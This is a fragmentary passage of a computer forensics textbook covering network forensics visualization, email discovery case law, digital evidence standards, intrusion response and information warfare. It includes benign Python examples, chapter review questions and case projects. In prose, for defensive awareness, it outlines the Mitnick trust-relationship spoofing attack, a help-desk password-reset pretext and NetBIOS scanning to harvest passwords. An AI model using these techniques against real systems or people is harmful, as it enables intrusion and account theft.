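The hidden-column rule of thumb (a header reading "A B C E H" means at least D, F, and G are hidden) generalizes to any column labels, including the two-letter ones beyond Z, and to hidden rows. The helper below is an added example, not code from the book; it converts spreadsheet column labels to and from their base-26 position and lists the gaps between the visible ones. Only gaps between visible labels can be inferred this way; columns hidden after the last visible one leave no trace in the header.

```python
"""List spreadsheet columns and rows hidden between the visible ones.

Added example, not the book's code. Column labels count in a bijective
base 26: A=1 ... Z=26, AA=27, AB=28, ..., ZZ=702.
"""
from typing import List


def col_to_index(label: str) -> int:
    """'A' -> 1, 'Z' -> 26, 'AA' -> 27."""
    n = 0
    for ch in label.upper():
        if not "A" <= ch <= "Z":
            raise ValueError(f"bad column label: {label!r}")
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def index_to_col(n: int) -> str:
    """1 -> 'A', 27 -> 'AA', 702 -> 'ZZ'."""
    if n < 1:
        raise ValueError("column index starts at 1")
    label = ""
    while n > 0:
        n, rem = divmod(n - 1, 26)
        label = chr(ord("A") + rem) + label
    return label


def hidden_columns(visible_header: str) -> List[str]:
    """Columns hidden between the visible labels, e.g. 'A B C E H' -> ['D', 'F', 'G']."""
    idx = [col_to_index(lbl) for lbl in visible_header.split()]
    if idx != sorted(set(idx)):
        raise ValueError("visible labels must increase strictly left to right")
    return [index_to_col(k) for left, right in zip(idx, idx[1:])
            for k in range(left + 1, right)]


def hidden_rows(visible_rows: str) -> List[int]:
    """Same idea for row numbers, e.g. '1 2 5' -> [3, 4]."""
    nums = [int(x) for x in visible_rows.split()]
    if nums != sorted(set(nums)):
        raise ValueError("visible row numbers must increase strictly top to bottom")
    return [k for a, b in zip(nums, nums[1:]) for k in range(a + 1, b)]


if __name__ == "__main__":
    print(hidden_columns("A B C E H"))   # the chapter's own example
    print(hidden_columns("Y Z AB"))      # label beyond Z
    print(hidden_rows("1 2 5 9"))
```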
You
can test the data against itself
...
Look for errors as well
...
This comparison can highlight coding errors made when creating the database such as wrong
numbers, dates, and names
...
Just as electronic data can be compared to underlying
documents, so also can it be compared to data in other electronic files, the contents
of other documents, and information available through the Internet
...
That said, there are several general recommendations that can be offered:
Put the data into tools you can use
...
Database programs can permit one to search or query
the databases in complex and subtle ways, perform calculations, and generate a
broad range of reports
...
SUMMARY
Once the data has been successfully collected, it must be analyzed to extract the evidence you wish to present and to rebuild what actually happened
...
Finally, this is where logging utilities come in
...
Refining the firewall rules, keeping the intrusion detection systems (IDSs) current, and reviewing
the log files will be important to stay one step ahead of the bad guys
...
Collecting electronic evidence is no trivial matter
...
Gathering electronic evidence is far from impossible
...
Audit trails can also be used to reconstruct events after a problem has occurred
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere to the provisional
list of actions for reconstructing past events
...
A
number of these systems have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Recovering electronic data is only the beginning
...
True or False? Even if the data is in a format that appears to be one you already
use, conversion may not be necessary
...
True or False? If you are going to attempt converting the data yourself, you may
be fortunate enough to have received electronic data that you can convert
directly into programs such as Access or Excel using the wizards built into
those programs
...
True or False? Once the data has been unsuccessfully collected, it must be analyzed
to extract the evidence you wish to present and to rebuild what actually happened
...
True or False? Refining the firewall rules, keeping the IDS current, and reviewing the log files will be important to stay one step ahead of the bad guys
...
The increase in computer-related crime has led to development of special tools
to recover and analyze what?
A
...
Computer data
C
...
Data specialists
E
...
Today, data can come on a variety of:
A
...
Media
C
...
Global positioning system (GPS) receivers
E
...
Having data on a useable medium is useless unless it also is in a:
A
...
Plot
C
...
Unuseable format
E
...
Hardware requirements will vary greatly depending on:
A
...
File fragments
C
...
Data miming
E
...
Electronic files often contain “hidden” data (information that does not show
up on any printouts of the file) that can potentially prove to be:
A
...
Not useful
C
...
Good
E
...
Management had identified four possible suspects but each denied
involvement
...
A CFS team (CFST) was
called to consult on the matter [2]
...
A default judgment had been entered against his
client because no answer had been filed with the court
...
However, the paralegal did not receive a stamped copy returned from the clerk and never followed up
...
A CFST was called in to perform a forensic analysis of the paralegal’s computer to determine when the document had been
created and last revised, hoping to verify her testimony [2]
...
The company requested that a CFST process the computer in
the subject’s office to determine if any evidence of the theft was there [2]
...
The intruder copied and then deleted almost 2,000 files relating to senior
executive compensation, corrupted the compensation database to give the clerk a
$250,000 raise, and tampered with audit trail information to disguise the date and
time of the intrusion
...
To make matters worse, the intruder physically stole another employee’s two-way pager and, from it, began sending increasingly threatening emails
to the clerk
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
(© 2002
Computer Forensic Evidence Solutions, Inc
...
12
Networks
As information systems become cheaper and cheaper, companies are rapidly
automating not only their overhead processes such as purchasing, payables,
hiring, and payroll, but also their value-adding processes such as marketing and sales
...
With this dependency comes a vulnerability: The ability of corporations to conduct their business is dependent on
technology that was designed to be as open as possible and that only a minority of
engineers and scientists understand
...
The
first way to do this is to analyze corporate resources for known vulnerabilities
...
This is what security scanners do
...
This is what intrusion detectors do
...
This is what firewalls do
...
What current intrusion detection systems (IDSs) do is monitor the network
and watch for specific patterns
...
However, if an attacker uses a method not previously known to
the IDS, it will transpire unnoticed, the corporate Web site will be defaced, employee records will be retrieved, or client lists will be extracted
...
Network forensics is the principle of reconstructing the activities leading to an event
and determining the answers to “What did they do?” and “How did they do it?” Instead of matching observed activities on a local area network (LAN) to a database
of known patterns of malicious intent, it records all activity on a LAN and provides
centralized tools to analyze the activity in real time for surveillance and historically
for damage assessment and prosecution
...
If a resource is accessible via a LAN for exploitation,
it is observable by a network forensics agent
...
Fortunately, a network
security system has been retaining all network packet information for the past six
months
...
These tools, in combination
with information produced from an on-site investigation, are used to identify suspect communications
...
In addition,
patterns of network misuse invisible to system administrators, caused by other perpetrators, were discovered through pattern analysis
...
A TECHNICAL APPROACH
One approach here will be to use an interactive visualization interface to drive the
underlying network forensic data acquisition tools and analysis routines
...
To
achieve this, you should propose to investigate different visualization techniques to
model the network security data
...
In addition, you should tie
these data visualizers into a visual query interface that can drive the network security database backend
...
avs
...
html)
...
Rapid data analysis and rich visualization techniques combined with an intuitive, graphical application development environment make
AVS/Express the best choice for any data visualization task
...
Also, an interactive data flow process allows multiple visualization steps to be combined as a single visualization macro
...
It is
a modular, hierarchical, open, and extensible system with hundreds of predefined
components for visualizing data
...
This data can consist of, but is not limited
to, a time, date, IP address pair, session type, and duration
...
For example, network communications such as
email, ftp transfers, and http sessions are considered to be session types
...
The data warehouse should consist of the following two
stages: stage 1 collects all observed network transactions and records them into logs;
stage 2 summarizes these transactions into objects and communicants producing a
network event
...
If
successful, these will support a smooth interactive visual query interface while still
allowing drilling down into the more extensive databases with additional, more extensive queries
...
One approach to integrate these reports into the visualization engine is to
develop network forensic data models that can hold the different types of report
data and provide a seamless input into the visualization engine through data readers
...
Visual Query Interface
The visual query interface allows the network security analyst to interactively probe
the output of the network forensic data visualizers
...
One is to expose greater detail at a particular data point
...
Second, one may use node information as a way to give additional constraints to a drill down query
...
An effective data visualization is highly segregated by space and color
...
Range constraints can be applied based
on the node data or color values
...
The goal here is to investigate the effectiveness of each of the preceding techniques
in browsing and navigating the network forensics database
...
Network Forensic Data Visualizers
Network forensic data visualizers are key to an understanding of the network forensic data
...
You should also investigate a number of different visualizations of the network
forensic data to see which methods work best in conveying useful information to
the network forensic analyst
...
Such an approach could also support
the visual query interface in a browse/detail mode
...
The network forensic database also has several possibly different modes of investigation
...
In this case, the visualization performs a mapping from time-ordered to
space-ordered view or presents a specific time range with other parameters such as
duration, ip_address, and session type being mapped spatially
...
Binning is a method used to map data to spatial axes in uniformly sized bins
...
Unique categorical values
define a bin
...
In the second mode of investigation, a network-event view of the database is
appropriate
...
Connections
could represent paths an intruder has used to enter the network domain
...
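The two-stage data warehouse, the session-type and duration attributes, the binning of data into uniformly sized bins, and the network-event view of connections between communicants can all be shown on a small sample. The program below is an added example, not the book's or AVS/Express's code: it parses a constructed stage-1 log of observed transactions, rolls them up into stage-2 network events keyed by (source, destination, session type), bins transactions into uniform time slots per session type, and builds the who-talked-to-whom adjacency that a connections view would draw. The port-to-session-type table and the log layout are assumptions of this example.

```python
"""Stage-2 summary of a stage-1 network transaction log, with time binning.

Added example, not the book's code. Stage 1 is the raw log of observed
transactions (a constructed sample here); stage 2 summarizes them into
network events per communicant pair and session type; bins map those
transactions onto uniform time slots for a spatial axis.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Assumed mapping from destination port to the chapter's session types.
SESSION_TYPES = {25: "email", 21: "ftp", 80: "http"}

# Constructed stage-1 log (not real traffic): date time src dst dst_port duration_s
STAGE1_LOG = """\
2002-03-04 09:15:02 10.1.1.5 192.168.7.20 25 38
2002-03-04 09:16:40 10.1.1.9 192.168.7.30 80 12
2002-03-04 09:17:05 10.1.1.9 192.168.7.30 80 9
2002-03-04 02:03:11 10.1.1.5 192.168.7.20 21 600
2002-03-04 02:14:52 10.1.1.5 192.168.7.20 21 720
2002-03-04 02:41:09 10.1.1.5 192.168.7.20 21 655
2002-03-04 14:02:00 10.1.1.7 192.168.7.20 443 30
"""


@dataclass
class Transaction:           # one stage-1 record
    when: datetime
    src: str
    dst: str
    session_type: str
    duration: int


@dataclass
class NetworkEvent:          # one stage-2 object: a pair of communicants + session type
    src: str
    dst: str
    session_type: str
    count: int = 0
    total_duration: int = 0
    first: Optional[datetime] = None
    last: Optional[datetime] = None


EventKey = Tuple[str, str, str]


def parse_stage1(lines: Iterable[str]) -> List[Transaction]:
    txns = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        date, time, src, dst, port, dur = line.split()
        when = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        txns.append(Transaction(when, src, dst,
                                SESSION_TYPES.get(int(port), "other"), int(dur)))
    return txns


def summarize(txns: Iterable[Transaction]) -> Dict[EventKey, NetworkEvent]:
    """Stage 2: fold transactions into network events."""
    events: Dict[EventKey, NetworkEvent] = {}
    for t in txns:
        ev = events.setdefault((t.src, t.dst, t.session_type),
                               NetworkEvent(t.src, t.dst, t.session_type))
        ev.count += 1
        ev.total_duration += t.duration
        ev.first = t.when if ev.first is None else min(ev.first, t.when)
        ev.last = t.when if ev.last is None else max(ev.last, t.when)
    return events


def bin_by_time(txns: Iterable[Transaction], width_minutes: int = 60) -> Counter:
    """Count transactions per (bin start, session type); bins are uniform,
    measured from midnight of each day, and session type is the categorical axis."""
    width = timedelta(minutes=width_minutes)
    counts: Counter = Counter()
    for t in txns:
        midnight = t.when.replace(hour=0, minute=0, second=0, microsecond=0)
        start = midnight + ((t.when - midnight) // width) * width
        counts[(start.isoformat(sep=" "), t.session_type)] += 1
    return counts


def communicant_graph(events: Dict[EventKey, NetworkEvent]) -> Dict[str, Set[str]]:
    """Undirected adjacency for the connections view: who talked to whom."""
    graph: Dict[str, Set[str]] = defaultdict(set)
    for src, dst, _ in events:
        graph[src].add(dst)
        graph[dst].add(src)
    return dict(graph)


if __name__ == "__main__":
    txns = parse_stage1(STAGE1_LOG.splitlines())
    for key, ev in summarize(txns).items():
        print(key, ev.count, ev.total_duration, ev.first, ev.last)
    for (slot, kind), n in sorted(bin_by_time(txns).items()):
        print(slot, kind, n)
```

In the sample, the hourly bins make the 02:00 cluster of long ftp sessions stand out against the working-hours email and http traffic, which is the kind of deviation from the norm the visualization is meant to surface; a narrower bin width sharpens the time axis at the cost of more, sparser bins.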
The
courts treat email as formal records—no different than print communication—so
be prepared for the legal consequences, including the fact that your company’s
email is discoverable in litigation
...
Reams
and megabytes of Microsoft email messages dating from the 1990s (including
Gates’ own) were used skillfully by the government in its antitrust case against Microsoft
...
Accordingly, the courts will not hesitate to compel businesses to produce these
records and, further, to sanction them for their failure to do so
...
D
...
1995), the court required the corporate defendant, CIBA-Geigy Corporation, to
produce over 30 million email messages stored on backup tapes and to foot the
$50,000–$70,000 cost of searching the messages and formatting them into a readable form
...
That the electronic data may be duplicative of print documentation already
produced in litigation is irrelevant
...
Co
...
Caruth, et al
...
W
...
Ct
...
1990) failed to produce computer files despite already having produced
approximately 30,000 boxes of material containing the same information, the court
sanctioned the company by conclusively deeming each allegation against the company to be true, thereby precluding the company from contesting the allegations
and leading to a default judgment against it
...
Do you remember Oliver North, whose deleted email messages from the White House were
retrieved from a mainframe backup tape during the Iran-Contra investigation? If
information that has been deleted has not yet been overwritten by the computer
system or is stored on back-up tapes or archive tapes, the information may still be
accessible
...
For example, in Computer Associates International, Inc
...
American
Fundware, Inc
...
R
...
166 (D
...
1990), a developer of a computer program, over the course of years, destroyed prior versions of a source code, retaining
only the current version
...
The
court held that the developer had received a copy of the lawsuit filed by the holder
of the copyright to the computer program but continued to destroy older versions
of the source code
...
Accordingly, the court entered default judgment against the developer as an appropriate sanction
...
Thompson Co
...
Gen’l Nutrition Corp
...
Supp
...
D
...
1984])
...
Sales Practices Litigation, 169 F
...
D
...
N
...
1997])
...
With such a policy in place, you may not stay out of the courtroom, but at least you will be prepared
if you ever find your company the target of a lawsuit or subpoena
...
This part of the chapter proposes the establishment of standards for the exchange of digital evidence between sovereign nations and is intended to elicit
constructive discussion regarding the damaging of digital evidence
...
Standard
operating procedures (SOPs) are documented quality-control guidelines that must
be supported by proper case records and use broadly accepted procedures, equipment, and materials
...
Guidelines that are consistent with scientific and legal principles are essential to the acceptance of results and conclusions by courts and other agencies
...
Rapid technological changes are the hallmark of digital evidence, with the
types, formats, and methods for seizing and examining digital evidence changing
quickly
...
Because a variety of scientific procedures may validly be applied to a given
problem, standards and criteria for assessing procedures need to remain flexible
...
In the digital evidence area, peer review of SOPs by
other agencies may be useful
...
Required
elements such as hardware and software must be listed, and the proper steps for successful use should be listed or discussed
...
Personnel who use
these procedures must be familiar with them and have them available for reference
...
Hardware used in the
seizure and examination of digital evidence should be in good operating condition
and be tested to ensure that it operates correctly
...
In general, documentation to support conclusions must be such that, in the absence of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator
...
Chain-of-custody documentation must be maintained for all digital evidence
...
Handwritten notes and observations must be in ink, not pencil, although pencil (including
color) may be appropriate for diagrams or making tracings
...
Notes and records should be authenticated by
handwritten signatures, initials, digital signatures, or other marking systems
...
A quality forensic program consists of properly trained personnel and appropriate
equipment, software, and procedures to collectively ensure these attributes
...
Composed of accredited government agencies involved in
computer forensic investigations, the IOCE identifies and discusses issues of interest to its constituents, facilitates the international dissemination of information,
and develops recommendations for consideration by its member agencies
...
In response to the G-8 Communique and Action plans of 1997, the IOCE was
tasked with the development of international standards for the exchange and recovery of undamaged electronic evidence
...
During the International Hi-Tech Crime and Forensics Conference (IHCFC)
of October 1999, the IOCE held meetings and a workshop that reviewed the United
Kingdom Good Practice Guide and the Scientific Working Group on Digital Evidence (SWGDE) Draft Standards
...
The
international principles developed by the IOCE for the standardized recovery of
computer-based evidence are governed by the following attributes:
Consistency with all legal systems
Allowance for the use of a common language
Durability
Ability to cross international boundaries
Ability to instill confidence in the integrity of evidence
Applicability to all forensic evidence
Applicability at every level, including that of individual, agency, and country [2]
Furthermore, the following international principles were presented, approved,
and approved again at the IHCFCs in October 1999 and 2001, respectively
...
When it is necessary for a person to access original digital evidence, that person
must be forensically competent
...
An individual is responsible for all actions taken with respect to digital evidence
while the digital evidence is in his possession
...
So, do you have a well-documented intrusion-detection response plan? In other
words, if you are attacked, do you have the documentation tools that are needed to
record the attack, so that you can make the proper response? Let’s take a look
...
There is also a need to have written requirements
for training IT staff on how to deal with intrusions
...
Training
should also include some form of regular fire drill
...
It is critical to capture as much information
as possible and create forms enabling users who are not intrusion detection specialists to provide as much information as possible
...
Target systems and networks
...
Purpose of systems under attack
...
Evidence of intrusion
...
List of parties to notify
...
Finally, when it comes to hardening your network against hackers, the best defense is to keep abreast of developing threats and to test your system with due diligence
...
SYSTEM TESTING
It seems you can’t open a newspaper or listen to the news these days without learning that yet another company’s network has been broken into
...
Even worse, thanks to the advent
of always-on DSL, ISDN, and cable modem connections, security breaches that
were once limited to large corporations or government facilities are now finding
their way into your homes as well
...
Fortunately, it’s
not hard to decrease the odds of attack or intrusion
...
In other words, a little effort can go a long way toward
securing your network
...
DNSs also provide a standard Internet mechanism
for storing and accessing other types of data, such as MX (mail exchange) records
...
Designed to be a robust, stable system on which
to build a sound organizational naming architecture, BIND (especially in its earliest versions) is notorious for its vulnerabilities
...
2
...
To make matters worse, network intrusion programs that automatically scan
networks and query corporate DNS servers looking for holes are becoming increasingly available to hackers, who use these programs to test a system’s locks the
way a traditional burglar might jiggle a doorknob
...
Once compromised, the DNS server can be used to launch disturbances such as
distributed DoS (denial of service) attacks to disrupt your business
...
First,
if yours is one of the many companies that runs outdated DNS software, an upgrade
is definitely in order
...
Your next step should be to limit your access to port 53 (the DNS port) on your
firewalls
...
Services and File Sharing
Although services and file sharing capabilities are available on both Windows and
Unix, Windows computers receive the brunt of file sharing attacks from trojan
horses and share compromises
...
These shares can then be run from any client machine with “log on as service” rights
...
Doing so will also improve network performance
...
Nothing extraneous should ever be put into use
...
Because Windows’ file-sharing service uses NetBIOS, the same mechanism that permits file sharing can also be used to retrieve sensitive system information, such as user names,
configuration information, and certain registry keys, via a “null session” connection
to the NetBIOS session service
...
Again, your best defense is diligence
...
Granted, it’s much easier to share an entire directory or forbid an entire
drive, but the extra effort necessary to provide more granular access privileges will
be well worth it
...
Even security experts readily
admit that firewalls and anti-virus procedures can offer only casual, “business as
usual” protection
...
There’s no way to secure your network against those kinds of attacks
...
Any protection is better than none
...
As
previously explained, network forensics is the principle of reconstructing the activities leading to an event and determining the answer to What did they do? and How
did they do it? Protecting your network against hackers need not be a full-time job
...
Conclusions
One approach to network intrusion detection and network forensics depends
on the development of new data visualization techniques to address the volumes of data collected in a forensics application
...
This comprehensive collection posture results in very large datasets that necessitate the use of data visualization techniques to reasonably analyze events
...
This will consist of gaining an understanding of IP session attributes, mapping these attributes to visual resources (x-axis,
y-axis, z-axis, color, shape, thickness, etc
...
The resulting visualizations should allow an analyst with a cursory understanding of data networks to identify normal patterns of network traffic and
therefore identify deviations from the norm
...
Different visualizations will be explored with ease of use and data density as the
evaluation criteria
...
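As an added illustration (not code from the book), the following Python sketch applies the approach above: constructed IP session records are mapped onto visual channels (source host on the y-axis, destination port on the x-axis, bytes moved as shade) and each source's attributes are compared with the median source so that a deviation from the norm, here a port sweep, stands out. The CSV record format, the glyph ramp and the threshold factor k are assumptions of this example.

```python
"""Map IP session attributes onto visual channels and flag deviations.

Added illustration of the network-forensics visualization approach
described above; not code from the book. All records are constructed.
"""
from collections import Counter, defaultdict
from statistics import median

# Constructed session records: src,dst,dst_port,bytes. Host 10.0.0.9 opens
# many tiny sessions to many ports, the shape of a port sweep.
SESSIONS = """\
10.0.0.4,192.168.1.10,80,5120
10.0.0.4,192.168.1.10,443,9800
10.0.0.5,192.168.1.10,443,7700
10.0.0.5,192.168.1.11,25,2048
10.0.0.6,192.168.1.10,80,4096
10.0.0.6,192.168.1.12,53,512
10.0.0.9,192.168.1.10,21,64
10.0.0.9,192.168.1.10,22,64
10.0.0.9,192.168.1.10,23,64
10.0.0.9,192.168.1.10,25,64
10.0.0.9,192.168.1.10,80,64
10.0.0.9,192.168.1.10,139,64
10.0.0.9,192.168.1.10,445,64
10.0.0.9,192.168.1.10,3389,64
"""

SHADES = " .:-=+*#"  # glyph ramp standing in for the "color" channel
ROW_LABEL = "src / port"


def parse_sessions(text):
    """Parse CSV lines into (src, dst, port, nbytes) tuples."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            src, dst, port, nbytes = line.split(",")
            rows.append((src, dst, int(port), int(nbytes)))
    return rows


def source_profiles(sessions):
    """Per-source attributes: session count, distinct ports, mean bytes."""
    ports, nbytes = defaultdict(set), defaultdict(list)
    for src, _dst, port, n in sessions:
        ports[src].add(port)
        nbytes[src].append(n)
    return {
        src: {
            "sessions": len(nbytes[src]),
            "ports": len(ports[src]),
            "mean_bytes": sum(nbytes[src]) / len(nbytes[src]),
        }
        for src in ports
    }


def density_grid(sessions):
    """x-axis = destination port, y-axis = source host, cell = bytes moved."""
    cells = Counter()
    for src, _dst, port, n in sessions:
        cells[(src, port)] += n
    ys = sorted({s[0] for s in sessions})
    xs = sorted({s[2] for s in sessions})
    return xs, ys, cells


def render_grid(xs, ys, cells):
    """ASCII rendering: shade grows with bytes; any traffic shows at least '.'."""
    peak = max(cells.values())
    out = [f"{ROW_LABEL:<12}" + "".join(f"{x:>6}" for x in xs)]
    for y in ys:
        row = []
        for x in xs:
            n = cells.get((y, x), 0)
            idx = max(1, round(n / peak * (len(SHADES) - 1))) if n else 0
            row.append(f"{SHADES[idx]:>6}")
        out.append(f"{y:<12}" + "".join(row))
    return "\n".join(out)


def flag_deviations(profiles, k=3.0):
    """Flag sources far from the median profile of all sources.

    A source is reported when it touches more than k times the median number
    of distinct ports, or moves less than 1/k of the median bytes per session.
    """
    port_base = median(p["ports"] for p in profiles.values())
    byte_base = median(p["mean_bytes"] for p in profiles.values())
    flagged = {}
    for src, p in profiles.items():
        reasons = []
        if p["ports"] > k * port_base:
            reasons.append(f"{p['ports']} distinct ports vs median {port_base:g}")
        if p["mean_bytes"] < byte_base / k:
            reasons.append(f"{p['mean_bytes']:.0f} mean bytes vs median {byte_base:g}")
        if reasons:
            flagged[src] = reasons
    return flagged


if __name__ == "__main__":
    sessions = parse_sessions(SESSIONS)
    print(render_grid(*density_grid(sessions)))
    for src, reasons in flag_deviations(source_profiles(sessions)).items():
        print(f"deviation: {src}: {'; '.join(reasons)}")
```

In the rendered grid the sweeping host appears as one sparse row of '.' cells spanning most columns, which is the visual pattern the analyst is meant to recognize before reading any numbers.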
The term evidence implies that the collector of evidence is recognized by the courts
...
A data object or physical item only becomes evidence when so deemed by a law
enforcement official or designee
...
Data objects may occur in different formats without altering the original information
...
Physical items are items on which data objects or information may be stored or
through which data objects are transferred
...
Duplicate digital evidence is an accurate digital reproduction of all data objects
contained on an original physical item
...
With forensic competency, there is a need to generate an agreement on international accreditation and the validation of tools, techniques, and training
...
The sharing of information that relates to high-tech crime and forensic computing is needed, such as events, tools, and techniques
...
With the volume of network traffic increasing every day, network security remains a top priority
...
328
Computer Forensics, Second Edition
An Agenda for Action
When completing the Networks Checklist (Table F12
...
The order is not significant; however, these are the activities for which
the researcher would want to provide a detailed description of procedures, review,
and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
Network forensic data and database
B
...
Network forensic data visualizers
D
...
Visual query data
2
...
Consistency with all legal systems
B
...
Fragility
D
...
Ability to instill confidence in the integrity of evidence
3
...
They are as follows, except:
A
...
B
...
C
...
D
...
E
...
4
...
Private information for person(s) discovering problem and responsible
parties
...
Target systems and networks
...
C
...
Know what systems are used for (payroll,
R&D, and so on), as well as some kind of a ranking of the importance of the
system
...
Evidence of intrusion
...
E
...
This can include the technical contacts, internal
legal contacts, and possibly the legal authorities
...
What current intrusion detection systems (IDSs) do is monitor the network
and watch for:
A
...
Specific patterns
C
...
Good patterns
E
...
In the
litigation, the version of the email in the sender’s possession was silent on the issue
of certain contract terms
...
It was alleged that one of the parties had tampered with
its electronic record, which had been sent from a Lotus Notes environment into a
Microsoft Outlook environment
...
So, how were they able to determine “who dunnit?”
HANDS-ON PROJECTS
When the CEO of a major company opened his email one morning, he was shocked
to see that overseas hackers were sending him confidential files from his own desktop hard drive
...
A CFST, working with the client’s
network personnel, preserved the evidence of the attack and assisted in determining how the attack occurred
...
The
company’s firewall logs indicated that the employee had downloaded terabytes of
data, and audit logs indicated that he had corrupted several production databases
...
A CFST
was called in to solve the problem
...
Optional Team Case Project
In March 2004, one of the largest independent Internet securities trading firms
contacted a CFST with a critical problem
...
The
company suspected an employee, a database programmer who had stormed out of
the business three days before, unhappy with his severance negotiations
...
Please
explain how the CFST went about solving this problem
...
Part IV
Countermeasures: Information Warfare
The fourth part of this book discusses how to fight against macro threats, defensive strategies for governments and industry groups, the information warfare arsenal and tactics of the military, the information warfare arsenal and tactics of terrorists and rogues, the information warfare arsenal and tactics of private companies, the information warfare arsenal of the future, surveillance tools for information warfare of the future, and civilian casualties (the victims and refugees of information warfare)
...
The National Security Agency (NSA) traces the
macro threat from hostile or potentially hostile governments as well as drug lords,
criminal cartels, and increasingly computer-savvy guerrilla groups
...
...
Cyberblitzes like those that briefly knocked out major Web sites a few years ago (including Yahoo! Inc.’s auction service, and Amazon’s retail site) could easily be copied on a larger scale
...
And if it should happen, a
future President had better move faster than Bush did during those infamous 7
minutes of pondering what to do when told of the 9-11 attacks
...
The NSA and other U.S. officials seem to be stepping up a public awareness campaign, spurred by the spread of information technology, growing knowledge of malicious computer code, and ever greater U.S. reliance on networked systems
...
...
A reasonable question that should be asked is “Why are we vulnerable?” In a recent report, the Defense Science Board Task Force on Information Warfare lays the blame at the U.S. government’s own doorstep
...
Program by program, economic sector by economic sector, the U.S. government has based critical functions on inadequately protected telecomputing services
...
...
...
From the standpoint of psychological operations, it’s not so much exploited technology as it is that the U.S. government has created a global information system it does not control and does not understand, and this in turn creates additional targets for exploitation
...
Recently, for example, a private security company alerted the FBI that it found
a malicious program on some 3,000 computers that could be remotely activated to
launch an attack on a site of choice—a trojan horse
...
In addition to the technological risk posed by many of these computers having very limited or no security, the users of these computers often are
attractive targets for social engineering efforts for a simple reason
...
From an IW perspective, there are three primary targets for the attacker using psychological operations (psyops)
...
If the attacker is simply a hacker, cracker, or script-kiddie, it might
be for nothing more than to grab a credit card number or prove to friends that he or
she could do it
...
...
The government also faces the threat of multinational efforts to subvert their defenses and find an economic, diplomatic, or military advantage
...
...
...
The U.S. government also cannot discount the potential entrance of organized crime into the equation, not to mention political activists and disgruntled employees
...
Although the commercial sector is beginning to realize the importance of security, the
information on virtually unprotected personal machines may very well hold the key
to a crippling attack on any sector simply because those sectors exist to allow the
personal machines to connect to do business
...
One of the most often
cited examples of a physical trust relationship that was exploited successfully is
the Mitnick attack
...
He was able to determine the probable response that host A would give to host
B after receiving the initiating packet in a three-way handshake
...
He then sent the expected response along with a small payload that contaminated host A’s
...
He dropped the attack on host B and simply accessed A as a
trusted root user
...
Imagine a worker at a large corporate call center
...
He calls and identifies himself as Bert Jackson, who has just
been hired by the boss
...
Unfortunately, he’s forgotten his password and it’s already 11 P.M. Can he get a new password or should he call the CEO and have him call? In a shop with strong security, that would be an easy call, but it’s easy to see that, in many cases, the call center worker would simply trust that the caller is who he says he is and give out a new password
...
If the company is also a prime contractor for the government, a public utility,
or even a company whose success or failure can severely impact the stock market,
then the attacker has gained a tremendous advantage by simply manipulating information he or she has gained by infiltrating the system
...
That group, perhaps over a period of months, maps IP ranges that are known to belong to public Internet service providers (ISPs) providing high-speed, always-on access to individuals and small businesses, and they map those ranges for the NetBIOS ports
...
Even though these passwords may be encrypted, with modern cracking tools being what they are, at the end of the mapping period, they very
well could have discovered thousands of accounts, including Bert Jackson’s, that
could be exploited
...
The distributed nature of this attack would make detection and prevention difficult, if not impossible, and would certainly create an atmosphere of fear and distrust that would severely affect the general economy
...
If the preceding scenario were executed by organized crime, it would probably fall into the battlefield type because they probably
would be looking to cause a drop in stock market prices where they could step in
and buy cheaply, thus allowing them to see an impressive gain as confidence rebounded
...
The attackers might be trying to distract the attention of the current administration away from what they might be attempting elsewhere (strategic) or attempting to bring together the economic resources needed to
launch a more serious battlefield attack against us later (consolidation)
...
However, trust also seems to be a social construct between two or more individuals
...
If that is the case, then how does the U.S. government overcome this tendency and protect their critical resources? Part of the difficulty they face here is that their focus tends to be on strengthening the security of their physical defenses, whether that be through encryption, perimeter-based defenses, host-based defenses, or, preferably, a combination of the three
...
...
These are technological trust defenses and likely will always be open to
attack
...
...
Why do computer viruses such as the “I Love You” virus of a few years ago work? Because users, whether corporate, government, or private, haven’t been taught how to protect themselves and change the paradigm of automatically trusting the email that announces it comes from Aunt Barbara
...
...
When virtually all private connections to the
Internet were made over modems connecting to a dynamic host configuration protocol (DHCP) server where each session was served with a different IP address, it
was much less likely that a private machine would be compromised and efforts to
compromise machines tended to be focused on commercial, government, and
educational systems
...
They also must understand the need to properly filter
their outgoing traffic to block and detect activity coming from within their networks that can be harmful to the general Internet community
...
The recent proliferation of email-related viruses has certainly awakened many to the dangers, but there must be a broader effort to educate and assist users in protecting themselves and the U.S. government from the bad guys
...
Psyops can work both ways
...
...
So it is with perception management
...
...
In helping them to protect themselves, the U.S. government also helps protect the rest of the users on the Internet who could be attacked by their systems if they are compromised
...
In a global environment where criminals, unfriendly political forces, and people who just don’t care about others have the same rights and access as anyone, trust can be dangerous
...
The U.S. government can pass all the laws it wishes, but it won’t affect the traffic that is coming out of countries such as Korea, China, and Singapore
...
If the U.S. government knows what needs to be done and doesn’t communicate it effectively, then whatever else it does is irrelevant
...
ARE OTHER GOVERNMENTS PREPARED
FOR INFORMATION WARFARE?
Are other governments ready to use information-age tricks against their adversaries? Yes, to some extent
...
...
Why did the department think his
computers were attacking theirs? The answer turned out to be startling
...
Rather, someone had lifted their electronic identities
...
Web hacking, it seems, isn’t just for amateurs anymore
...
From Beijing to Baku, governments and their surrogates are using the Internet to harass political opponents and unfriendly neighbors, to go after trade secrets, and to prepare for outright warfare
...
Dissidents describe the attacks
as inept—proof, perhaps, that dictatorships are still behind the hacking curve
...
In January 2000, hackers from Azerbaijan with names
like “The Green Revenge” and “Hijack” tampered with dozens of Armenian-related
Web sites, including host computers in the United States
...
Relations are tense between Azerbaijan and Armenia, who fought a war over the disputed territory of Nagorno-Karabakh, so it
wasn’t long before the Armenians retaliated in kind
...
